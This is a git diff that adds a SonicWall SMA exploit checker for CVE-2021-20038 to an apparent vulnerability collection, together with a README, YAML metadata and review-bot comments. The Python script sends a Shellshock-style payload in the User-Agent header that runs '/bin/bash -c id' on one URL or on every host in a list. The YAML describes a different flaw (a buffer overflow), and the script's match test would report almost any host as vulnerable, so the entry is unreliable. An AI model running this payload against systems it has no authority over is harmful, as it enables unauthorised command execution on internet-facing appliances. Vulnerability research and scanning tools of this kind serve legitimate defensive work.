diff --git a/cve/SonicWall/2021/CVE-2021-20038/CVE-2021-20038.py b/cve/SonicWall/2021/CVE-2021-20038/CVE-2021-20038.py
new file mode 100644
index 0000000000000000000000000000000000000000..158cde4a1feb893fc5db6c875ad65aebaa03a0bb
--- /dev/null
+++ b/cve/SonicWall/2021/CVE-2021-20038/CVE-2021-20038.py
@@ -0,0 +1,68 @@
+import requests
+import urllib3
+import sys
+from urllib import parse
+
+
+requests.packages.urllib3.disable_warnings()
+
+def banner():
+ print('baby test')
+
+def help():
+ print(' SonicWall RCE -h 查看帮助 ')
+ print(' SonicWall RCE -u 输入待检测url ')
+ print(' SonicWall RCE -f 输入待检测文件 ')
+
+def poc(url):
+ path="/cgi-bin/jarrewrite.sh"
+ vulnurl=url + path
+ #print(vulnurl)
+ headers = {
+ "User-Agent": "() { :; }; echo ; /bin/bash -c id",
+}
+ try:
+ res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+ if "id" in res.text and res.status_code==200:
+ print(res.text+url+"is vuln 漏洞存在")
+ else:
+ print(url+"is not vuln 漏洞不存在")
+ except Exception as e:
+ print(e)
+
+def poc1(files):
+ for url in open(files):
+ url=url.strip()
+ path="/cgi-bin/jarrewrite.sh"
+ vulnurl=url + path
+ #print(vulnurl)
+ headers = {
+ "User-Agent": "() { :; }; echo ; /bin/bash -c id",
+ }
+ try:
+ res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+ if "id" in res.text and res.status_code==200:
+ print("[*] "+res.text+url+"is vuln 漏洞存在")
+ else:
+ print("[*] "+url+"is not vuln 漏洞不存在")
+ except Exception as e:
+ print(e)
+
+if __name__ == '__main__':
+ try:
+ banner()
+ print('by baby')
+ cmd1=sys.argv[1]
+
+ if cmd1=='-h':
+ help()
+ elif cmd1=='-u':
+ cmd2=sys.argv[2]
+ poc(cmd2)
+ elif cmd1=='-f':
+ cmd2=sys.argv[2]
+ poc1(cmd2)
+ else:
+ print("请输入正确参数,或者-h查看帮助")
+ except:
+ print("输入-h查看帮助")
\ No newline at end of file
diff --git a/cve/SonicWall/2021/CVE-2021-20038/README.md b/cve/SonicWall/2021/CVE-2021-20038/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..8e3778dff37e6f1a8a91a54bb4f8b20d63e1cf23
--- /dev/null
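Review bot: The match condition `"id" in res.text` in `poc` of CVE-2021-20038.py (repeated in `poc1`) is true for almost any HTML body, because `id=` attributes and words containing "id" are everywhere, so any host answering 200 on that path gets reported as vulnerable. Match the shape of the command's output instead, e.g. `if res.status_code == 200 and re.search(r"\buid=\d+\(", res.text):` with `import re` added at the top. `poc1` duplicates the body of `poc` and never closes the list file; `with open(files) as fh:` and one call to `poc(url.strip())` per line would remove most of the duplication. The bare `except:` around the argument handling also hides real errors behind the help text, so catch `IndexError` only, and drop the unused `urllib3` and `parse` imports.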
+++ b/cve/SonicWall/2021/CVE-2021-20038/README.md
@@ -0,0 +1,9 @@
+# SonicWallSSL-VPN_RCE
+CVE-2021-20038
+
+命令行传参
+-h 查看帮助
+-u 指定url
+-f 指定file文件
+
+file内部的格式需添加http/https头
diff --git a/cve/SonicWall/2021/yaml/CVE-2021-20038.yaml b/cve/SonicWall/2021/yaml/CVE-2021-20038.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..bf946100f88dad533a65b1f307657072314da104
--- /dev/null
+++ b/cve/SonicWall/2021/yaml/CVE-2021-20038.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-20038
+source: https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE
+info:
+ name:
+ SonicWall安全移动接入(SMA)系列解决方案简化了端到端安全远程访问, 可跨本地, 云和混合数据中心访问托管的资源, 对应用程序实施策略访问控制, 在用户和设备标识之间建立信任关系, 之后可对应用进行多层安全控制, 让用户可随时随地安全工作.
+ severity: critical
+ description:
+ A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
+ scope-of-influence:
+ SMA 200, 210, 400, 410 and 500v firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20038#match-7894400
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-20038
+ cwe-id: CWE-787, CWE-121
+ cnvd-id: None
+ kve-id: None
+ tags: cve2021, Apache, RCE
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 3082ba010ce15c3ad13c12b30258832bc6d38371..7fba30d29cf812986ce6abe480711917b133ccfd 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -40,6 +40,8 @@ cve:
 apache-Struts:
 - CVE-2017-9805
 - CVE-2018-11776
+ SonicWall:
+ - CVE-2021-20038
 unzip:
 - CVE-2022-0529
 django:
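Review bot: The `description` in CVE-2021-20038.yaml does not appear to match what the checker in this commit tests. It describes a stack-based buffer overflow in mod_cgi environment-variable handling, while the script sends a Bash function-definition string in `User-Agent` to `/cgi-bin/jarrewrite.sh`, which looks like a probe for a different flaw (Bash environment function import). If that reading is right, a "not vuln" result says nothing about exposure to the overflow and would mislead patch triage, so confirm which issue the script covers and label the entry accordingly. Separately, `name:` holds a product description rather than a vulnerability title, and the tags would be more useful naming the product, e.g. `tags: cve2021, SonicWall, SMA100, RCE`.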